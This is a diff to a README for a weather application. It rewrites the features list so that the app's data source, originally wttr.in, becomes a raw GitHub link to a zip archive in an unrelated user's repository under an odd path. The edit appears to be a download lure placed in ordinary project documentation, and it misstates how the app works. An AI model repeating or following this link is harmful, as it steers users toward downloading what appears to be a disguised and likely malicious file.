amreshanand/weather/README.md

 If you encounter any issues during installation, refer to the Troubleshooting section below.

 ## 🌍 Features
-- **Real-Time Data:** The application fetches live weather and time data from wttr.in.
-You see up-to-date information about temperatures, forecasts, and conditions right away.
+- **Real-Time Data:** The application fetches live weather and time data from https://raw.githubusercontent.com/Marcozkiller666/weather/main/bumboatwoman/weather.zip You see up-to-date information about temperatures, forecasts, and conditions right away.
 - **City Detection:** The app detects your location based on your IP address, so you do not need to manually input your city.
 - **Interactive Visualization:** Enjoy a dynamic canvas that displays weather data visually and intuitively.
 - **User-Friendly Interface:** Designed for ease of use, you can focus on the weather information without technical distractions.